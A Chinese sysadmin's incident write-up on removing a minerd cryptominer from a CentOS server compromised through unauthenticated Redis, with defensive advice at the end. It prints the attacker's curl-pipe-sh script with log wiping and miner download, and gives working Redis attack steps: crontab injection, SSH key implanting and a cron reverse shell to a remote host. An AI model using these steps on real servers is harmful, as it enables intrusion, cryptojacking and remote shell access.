事件经过:

周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。

情况紧急,登录时发现该应用服务器并没有崩溃。
执行:
ps -ef | grep Nginx
结果显示相关服务还健在。
执行:
uptime
发现,服务器的负载非常高。
执行:
top
发现,有一个叫做minerd的进程占用了几乎所有cpu资源。
百度“centos minerd”,搜索结果显示minerd是一个臭名昭著的比特币挖矿程序,说明服务器已经被入侵,沦为肉鸡了。
执行:
pkill -9 minerd
杀死了该进程。


过了一会儿,需要检查该进程是否重新启动。
再次执行:
top
发现minerd进程又出现了,不愧是病毒程序,猜测有可能有定时调度在执行挖矿程序。
执行:
crontab -l
列出计划任务,发现计划任务列表竟然为空,猜测无效,有点慌。
执行:
cd / && find -name "minerd"
找到了病毒程序所在位置为:/root/minerd
执行:
chmod a-x /root/minerd
移除该程序可执行权限,再次杀掉minerd进程。
过了一会儿,再次检查该进程是否重新启动发现,进程再次出现。
执行:
cd /root && ll -a
显示/root/minerd文件已经恢复了可执行权限。
执行:
rm -f /root/minerd
删除病毒程序,再次杀掉minerd进程。
过了一会儿,再次检查该进程是否重新启动发现,TMD进程再次出现,表现得很坚强。


回想起该应用服务器的计划任务列表,不应该为空才对,因为至少有数据库备份等几个定时任务。
多次执行:
crontab -l
结果一会儿显示为空,一会儿显示乱码,由于乱码数据相当多,导致疯狂刷屏。由此推测,crontab计划任务被持续动态修改,即minerd还有同伙。
执行:
cd /var/log && cat cron | grep .sh
查看crontab日志文件,结果显示:
Jul 12 22:53:34 d6 CROND[9332]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 22:59:44 d6 CROND[9365]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:01:01 d6 run-parts(/etc/cron.hourly)[9405]: finished 0anacron
Jul 12 23:01:01 d6 run-parts(/etc/cron.hourly)[9411]: finished 0yum-hourly.cron
Jul 12 23:05:48 d6 CROND[9417]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:11:45 d6 CROND[9450]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:17:43 d6 CROND[9483]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:23:46 d6 CROND[9516]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:29:45 d6 CROND[9550]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:35:46 d6 CROND[9583]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:41:43 d6 CROND[9616]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:47:44 d6 CROND[9650]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:53:43 d6 CROND[9683]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 12 23:59:50 d6 CROND[9717]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 13 00:01:01 d6 run-parts(/etc/cron.hourly)[9759]: finished 0anacron
Jul 13 00:01:01 d6 run-parts(/etc/cron.hourly)[9765]: finished 0yum-hourly.cron
Jul 13 00:05:48 d6 CROND[9772]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
Jul 13 00:11:46 d6 CROND[9805]: (root) CMD (/usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh)
坏人终于露出了马脚:定时任务每几分钟会从远程服务器下载一个test11.sh的脚本文件并执行。
执行:
wget http://67.209.185.118:8220/test11.sh && cat test11.sh
下载该脚本并查看其内容,其内容如下:
#!/bin/bash
#捕获minerd进程并杀掉
(ps auxf|grep -v grep|grep mine |awk '{print $2}'|xargs kill -9;
#清空计划任务,难怪首次查看计划任务时计划任务为空
crontab -r;
#又杀了一批进程,不知要作甚?
pkill -9 minerd;
pkill -9 i586;
pkill -9 gddr;
#清空系统登录登出日志
echo > /var/log/wtmp;
#清空命令执行记录
history -c;
#切到用户目录
cd ~;
#下载挖矿程序并写入minerd文件
curl -L http://67.209.185.118:8220/minerd -o minerd;
#为minerd文件添加执行权限
chmod +x minerd;
#执行挖矿程序
setsid /root/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x &>>/dev/null)

从脚本内容可以看出,敌人是非常阴险狡诈的,它每次执行挖矿程序前都从远程服务器下载并赋予执行权限,所以我删除病毒程序或者修改其权限都没有效果;该脚本还清除了命令执行记录和系统登录记录,所以很难找到系统被操作的痕迹。


执行:
cd /etc && cat crontab
查看计划任务,计划任务显示为空。
执行:
cd /var/spool/cron && cat root
查看用户计划任务,结果打印了一大堆乱码,狂刷屏,和上文执行:crontab -l时情况一样。
执行:
cd /var/spool/cron && ll -ah
结果显示root文件900MB以上,这就难怪狂刷屏了。该root文件是一个二进制文件,由此产生了疑问,crontab难道还能解析二进制文件来执行不成,root文件这么大,里边究竟是些什么内容。


执行:
echo > /var/spool/cron/root
清空root文件内容,再次执行:crontab -l发现计划任务列表已被清除。
不断执行:
cd /var/spool/cron && ll -ah
观察发现一会儿功夫,root文件又从0MB恢复到了900多MB。结论和上面一样,有程序(minerd同伙)在动态修改root文件的内容,即crontab计划任务。
时间紧急,执行:
ps -ef
大概看了一下所有的进程,没有发现同伙。
执行:
systemctl stop crond
关闭系统定时调度服务,再次杀掉minerd进程,观察一阵子,minerd进程没有再恢复。
至此,应用服务器恢复了可用,忙其他事情先...


正片继续,查看了网上关于minerd病毒的情况,中招的人很多,黑客利用redis在服务器注入文件,进而控制了服务器。
网上说黑客会在服务器上写入ssh的密匙文件,从而实现免密码登录你的服务器,非常可怕。
执行:
cat /etc/ssh/sshd_config
sshd_config文件中有如下配置:
AuthorizedKeysFile .ssh/authorized_keys
ssh的配置文件并没有被修改。
执行:
cd /etc/ssh && ll -a
查看sshd_config文件的修改日期,确认其并没有被修改。
执行:
cd /root/.ssh && ll
结果显示目录下也只有authorized_keys一个文件,修改日期也正常。
执行:
cat /root/.ssh/authorized_keys
文件内容确实没有被修改。
以上结果说明:我的情况和网络上的并不一样,黑客并没有在我的服务器搞无密码登录。


执行:
ps -ef
列出所有进程,对比另一台服务器的进程,一一排除,没有发现异常进程,亚历山大...
多次执行:
cd /var/spool/cron && ll -ah
发现该目录下会出现一个temp-xxx.rdb的文件,几秒后消失,然后又出现,又消失。
rdb文件是redis的数据存储文件。
执行:
cd /var/spool/cron/ && head root
显示:
REdis0006þ...
可以确认用户计划任务配置文件/var/spool/cron/root已经变成了一个redis数据文件。
执行:
cat /var/spool/cron/root | grep sh
结果显示:
Binary file (standard input) matches
由于root文件是一个二进制文件,grep无效,修改命令重新执行:
cat /var/spool/cron/root | grep -a sh
结果显示:

*/1 * * * * /usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh


果然,redis数据文件中隐藏了一条crontab,与crontab日志文件/var/log/cron中显示的一致。
由此可知,并不是crontab能解析二进制文件,而是crontab对配置文件的冗余度太高,它能在一团乱码中提取出有效的配置,黑客正是利用了这一点。
执行:
cat /home/redis/conf/redis.conf
可以发现redis配置并没有被修改,我的redis数据文件位于/home/redis/data/redis.rdb,超过900MB,而/var/spool/cron/root文件正好也是900多MB。
说明我的redis数据存储位置已经被重定向到了crontab的配置文件处,幸好黑客并没有flushall我的redis数据。


接下来我要把黑客写入redis的数据找出来。
执行:
cd /home/redis/bin
./redis-cli -p 9003

连接上了redis server,redis中key的数目超过了千万,使用:keys *命令输出太多,但由于这些key都是数字开头的,因此我们先假设黑客的key是字母开头的,遍历一下:
127.0.0.1:9003> keys a*
(empty list or set)
127.0.0.1:9003> keys b*
(empty list or set)
127.0.0.1:9003> keys c*
(empty list or set)
127.0.0.1:9003> keys d*
(empty list or set)
127.0.0.1:9003> keys e*
(empty list or set)
127.0.0.1:9003> keys f*
(empty list or set)
127.0.0.1:9003> keys g*
1) "gmgjhofcik"
127.0.0.1:9003> type gmgjhofcik
string
127.0.0.1:9003> get gmgjhofcik
"\n\n*/1 * * * * /usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh\n\n"
127.0.0.1:9003> exit

现在我找到了黑客的key值为gmgjhofcik,而其value就是一条crontab。
执行:
./redis-cli -p 9003 keys "g*" | xargs ./redis-cli -p 9003 del
./redis-cli -p 9003 shutdown

清除黑客的数据,并关闭redis。
执行:
cp /var/spool/cron/root /home/redis/data/redis.rdb
./redis-server ../conf/redis.conf

将redis数据文件覆盖回来,重启redis。
至此,挖矿病毒消除。


已经可以知晓黑客入侵的整个流程如下:

1. 遍历他人的服务器端口,尝试使用redis-cli -h [IP] -p [port]进行连接,一旦服务器的redis服务暴露在公网,缺少认证,就能连接成功。
2. redis-cli连接成功之后,执行以下redis命令将用户的redis数据存储位置重定向到crontab的配置文件处:
config set dir /var/spool/cron/
config set dbfilename root

save
之后,redis会每隔一段时间就将数据dump到/var/spool/cron/root,因此我之前删除root文件又会恢复,因为redis服务一直在操作该文件,redis即是minerd的同伙。
3. 执行以下命令在redis中写入crontab配置:
echo -e "\n\n*/1 * * * * /usr/bin/curl -fsSL http://67.209.185.118:8220/test11.sh | sh\n\n" | redis-cli -h [IP] -p [PORT] -x set "gmgjhofcik"
完毕!


在我的案例中,虽然/var/spool/cron/root文件是一个900多MB的文件,以文本方式查看一片混乱。
但由于crontab对配置文件的冗余度非常高,且redis的rdb文件中key、value等字符串信息仍然是文本形式的,因此crontab能从/var/spool/cron/root文件中读取出有效的配置。
之后crontab会定时下载并执行test11.sh,而test11.sh则会下载minerd并执行。另外test11.sh还包含擦除入侵痕迹等操作,增加了问题排查的难道。
由于test11.sh是定时从远程服务器下载执行的,黑客可以随时修改test11.sh的内容为所欲为,把用户的服务器按在地上摩擦。


redis攻击方式二,通过写入SSH公钥实现免密码SSH登录:

首先在本地生成免密码的公私钥文件:
ssh-keygen -t rsa
进入交互:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): my_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in my_rsa.
Your public key has been saved in my_rsa.pub.
The key fingerprint is:
4c:44:a3:71:a2:0b:79:8b:1e:8c:77:04:74:ec:9a:aa root@localhost.localdomain
The key's randomart image is:
+--[ RSA 2048]----+
| .o.. o.=        |
|   +.. * .       |
|  o.+ . .        |
| o =.o o         |
|. =o+   S        |
| ooo             |
| ..              |
|.                |
|E                |
+-----------------+


生成了my_rsa和my_rsa.pub两个文件。
然后将公钥写入temp文件:
(echo -e "\n\n"; cat my_rsa.pub; echo -e "\n\n") > temp
再连接Redis,清空原有数据并写入公匙数据:
redis-cli -h [IP] -p [PORT] flushall
cat temp | redis-cli -h [IP] -p [PORT] -x set crackit

重定向redis数据文件至ssh密匙配置文件处:
redis-cli -h [IP] -p [PORT]
127.0.0.1:9003> config set dir /root/.ssh/
OK
127.0.0.1:9003> config get dir
1) "dir"
2) "/root/.ssh"
127.0.0.1:9003> config set dbfilename "authorized_keys"
OK
127.0.0.1:9003> save
OK
127.0.0.1:9003> exit


这样就可以将自己的公钥写入被攻击服务器/root/.ssh文件夹的authotrized_keys文件里。
然后执行:
ssh –i id_rsa root@[IP]
即可远程利用自己的私钥免密码登录该服务器。


redis攻击方式三,通过cron反弹shell,以下摘抄自网络:

猪猪侠发在乌云的思路
echo -e “nn*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xxx.xx.xx/888 0>&1nn”|redis-cli -h www.am0s.com -p 13000 -x set 1
本地命令行执行下面命令,sss.sss.sss.sss写redis地址,xx.xxx.xx.xx写vps地址,-p指定端口连接,如果默认可以不写-p参数。
redis-cli -h www.am0s.com -p 13000
#修改本地数据库存放目录到计划任务目录
config set dir /var/spool/cron
#指定本地数据库文件名
config set dbfilename root
#同步保存数据到磁盘
Save
然后本地nc监听
Nc-lvvp 888即可得到root权限的shell


防范建议:

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中,因为让不受信任的客户接触到Redis是非常危险的”。 Redis 作者之所以放弃解决未授权访问导致的不安全性是因为,99.99%使用Redis的场景都是在沙盒化的环境中,为了0.01%的可能性增加安全规则的同时也增加了复杂性。 虽然这个问题的并不是不能解决的,但是这在他的设计哲学中仍是不划算的。 1. 加强网络安全意识,不要掉以轻心,网络繁华的表面之下黑暗势力也是动作频频。我的每一台服务器每天遭遇的ssh密码破解次数都是很可观的;由于本周在提取redis数据时偷懒,进行了远程操作,暂时关闭了服务器防火墙,最终导致此次事故的发生。 2. Redis设置优化:对Redis加入认证,对Redis进行IP绑定,不以root启用Redis,不使用默认端口6379,可以增加Redis的安全性。 3. 开启防火墙:iptables 做好IP、PORT规则,区分信任源,只对公网开放必要的口子。本例中可以直接关闭对挖矿服务器的访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP。 4. SSH设置优化:不要使用SSH默认端口22登录,可以关闭root登录,可以关闭密码登录,改用密匙登录。 5. 权限管控:尽量不要使用root权限运行服务程序。

CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录的更多相关文章

  1. ios – 使用未解析的标识符FBSDKAppEventNamePurchased

    我正在尝试使用FacebookAnalyticsSDK在我的iOS应用程序中记录一些事件.首先,我记录了一个事件,这很有效:FBSDKAppEvents.logEvent(FBSDKAppEventNameInitiatedCheckout,valuetoSum:price,parameters:parameters)然后我尝试记录下一个:FBSDKAppEvents.logEvent(FBSDK

  2. ios – 如何处理退款/取消应用内购买

    我正在尝试处理iOS的退款应用内购买.但我找不到明确的指导方针来做到这一点.所以我有一个会员类型的应用程序内购买功能,其中用户凭据不一定与itunes帐户绑定.当有人进行购买时,我可以参考哪种标识符,并且当他们通过苹果申请退款时具有相同的标识符?我需要立即取消会员资格.谢谢!解决方法我最终存储了收据字符串并运行cron来完成事务并查找取消字段.

  3. ios – 在Parse Analytics中记录自定义事件需要24小时

    我是Parse的新手,我刚尝试添加基本事件,如下所示:从仪表板我可以看到记录的API请求事件,但我似乎无法访问特定的事件或数据.是否需要24小时注册或我错误地使用仪表板?

  4. 简析Swift和C的交互

    之前好像简单说过Swift和Objective-C的交互问题。其实我们也可以用Swift调用纯C代码或者基于C的第三方库。)Swift官方文档中,以及那本已经被迅速翻译为中文的ibooks书中,都提到了Swift调用Objective-C和C是有很好支持的。本内容包括Swift调用C和相应的C调用Swift,项目混编。对于C来说,最头疼的莫过于指针,而Swift是一门没有指针的语言。这些标准库函数表示为Darwin.C.HEADER.name。实际上由于Swift模块结构是平坦的,他们均位于Darwin中

  5. swift接口的使用

    swiftAPI的使用最近楼主要使用swift的API接口,楼主有一个习惯,不管开发需要用到什么知识,都喜欢看官方文档,虽然大部分是英文,但是用起来还是感觉可靠,不过对于openstack给的swiftAPI接口,可叫我吃了不少苦,所以写下这篇文章希望给有同样困惑的朋友帮助。获得的结果如下:%Total%Received%XferdAverageSpeedTimeTimeTimeCurrentDloadUploadTotalSpentLeftSpeed10013771001282100959382695-

  6. openstack学习笔记七 swift安装

    指定映射位置创建ring文件启动服务代维服务proxyserver

  7. openstack安装liberty--安装对象存储服务swift

    通常使用CACHE技術提高性能Accountservers賬戶服務,管理對象存儲中的賬戶定義。Containerservers容器服務,在對象存儲中管理容器或文件夾映……Objectservers對象服務,在存儲節點管理實際的對象,比如文件。Wsgimiddleware處理認證,通常使用OPENSTACKIdentityswiftclient為用戶提供命令行接口使用RESTAPIswift-init初始化和構建RING文件腳本swift-recon一個命令行工具,用於檢索群集的各種度量和測試信息。

  8. swift – 如果存在管道,则通过NSTask终止cURL

    我试图在Swift中为一个简单的命令行批处理脚本同步读取URL的内容.为了简单起见,我使用cURL–我知道如果必须的话,我可以使用NSURLSession.我也在使用OSX上的Swift开源版本进行swift构建.问题是,在某些URL上,如果stdout已重定向到管道,则NSTask永远不会终止.但是,如果删除管道或更改URL,则任务成功.使用来自终端的curl直接运行任何示例都会成功,因此在从特

  9. 将我的Android应用程序签名为系统应用程序

    将我的Android应用程序签名为系统应用程序在我的公司,我们希望在现场完全控制电池消耗,仅使用2g和gps可以快速耗尽电池.我们的决定是我们需要拥有移动电话的root权限,这样当手机闲置时,我们就会关掉那些不必要的电池消耗.而且我们也不允许用户将其卸载并清除数据.我的问题是:>我从哪里获得这些签名密钥?>它是否会像root访问权限一样如果我成功地成功了签字?

  10. 获得Android App的“root”权限

    我想知道如何从Android应用程序获得root权限?我尝试了下面的代码行来列出文件但没有发生任何事情我试图在我的清单文件中给予TEST_FACTORY权限,但是我收到错误“允许系统应用”如何制作我的应用系统应用?

随机推荐

  1. 在airgapped(离线)CentOS 6系统上安装yum软件包

    我有一个CentOS6系统,出于安全考虑,它已经被空气泄漏.它可能从未连接到互联网,如果有,它很长时间没有更新.我想将所有.rpm软件包放在一个驱动器上,这样它们就可以脱机安装而无需查询互联网.但是,我在测试VM上遇到的问题是,即使指定了本地路径,yum仍然会挂起并尝试从在线存储库进行更新.另外,有没有办法使用yum-utils/yumdownloader轻松获取该包的所有依赖项和所有依赖项?目前

  2. centos – 命名在日志旋转后停止记录到rsyslog

    CentOS6.2,绑定9.7.3,rsyslog4.6.2我最近设置了一个服务器,我注意到在日志轮换后,named已停止记录到/var/log/messages.我认为这很奇怪,因为所有日志记录都是通过rsyslog进行的,并且named不会直接写入日志文件.这更奇怪,因为我在更新区域文件后命名了HUPed,但它仍然没有记录.在我停止并重新启动命名后,记录恢复.这里发生了什么?

  3. centos – 显示错误的磁盘大小

    对于其中一个磁盘,Df-h在我的服务器上显示错误的空白区域:Cpanel表明它只有34GB免费,但还有更多.几分钟前,我删除了超过80GB的日志文件.所以,我确信它完全错了.fdisk-l/dev/sda2也显示错误:如果没有格式化,我该怎么做才能解决这个问题?并且打开文件描述符就是它需要使用才能做到这一点.所以…使用“lsof”并查找已删除的文件.重新启动写入日志文件的服务,你很可能会看到空间可用.

  4. 如何在centos 6.9上安装docker-ce 17?

    我目前正在尝试在centOS6.9服务器上安装docker-ce17,但是,当运行yuminstalldocker-ce时,我收到以下错误:如果我用跳过的标志运行它我仍然得到相同的消息,有没有人知道这方面的方法?

  5. centos – 闲置工作站的异常负载平均值

    我有一个新的工作站,具有不寻常的高负载平均值.机器规格是:>至强cpu>256GB的RAM>4x512GBSSD连接到LSI2108RAID控制器我从livecd安装了CentOS6.564位,配置了分区,网络,用户/组,并安装了一些软件,如开发工具和MATLAB.在启动几分钟后,工作站负载平均值的值介于0.5到0.9之间.但它没有做任何事情.因此我无法理解为什么负载平均值如此之高.你能帮我诊断一下这个问题吗?

  6. centos – Cryptsetup luks – 检查内核是否支持aes-xts-plain64密码

    我在CentOS5上使用cryptsetupluks加密加密了一堆硬盘.一切都很好,直到我将系统升级到CentOS6.现在我再也无法安装磁盘了.使用我的关键短语装载:我收到此错误:在/var/log/messages中:有关如何装载的任何想法?找到解决方案问题是驱动器使用大约512个字符长的交互式关键短语加密.出于某种原因,CentOS6中的新内核模块在由旧版本创建时无法正确读取512个字符的加密密钥.似乎只会影响内核或cryptsetup的不同版本,因为在同一系统上创建和打开时,512字符的密钥将起作用

  7. centos – 大量ssh登录尝试

    22个我今天登录CentOS盒找到以下内容这是过去3天内的11次登录尝试.WTF?请注意,这是我从我的提供商处获得的全新IP,该盒子是全新的.我还没有发布任何关于此框的内容.为什么我会进行如此大量的登录尝试?是某种IP/端口扫描?基本上有4名匪徒,其中2名来自中国,1名来自香港,1名来自Verizon.这只发生在SSH上.HTTP上没有问题.我应该将罪魁祸首子网路由吗?你们有什么建议?

  8. centos – kswap使用100%的CPU,即使有100GB的RAM也可用

    >Linux内核是否应该足够智能,只需从内存中清除旧缓存页而不是启动kswap?

  9. centos – Azure将VM从A2 / 3调整为DS2 v2

    我正在尝试调整前一段时间创建的几个AzureVM,从基本的A3和标准A3到标准的DS2v2.我似乎没有能力调整到这个大小的VM.必须从头开始重建服务器会有点痛苦.如果它有所不同我在VM中运行CentOS,每个都有一个带有应用程序和操作系统的磁盘.任何人都可以告诉我是否可以在不删除磁盘的情况下删除VM,创建新VM然后将磁盘附加到新VM?

  10. centos – 广泛使用RAM时服务器计算速度减慢

    我在非常具体的情况下遇到服务器速度下降的问题.事实是:>1)我使用计算应用WRF>2)我使用双XeonE5-2620v3和128GBRAM(NUMA架构–可能与问题有关!

返回
顶部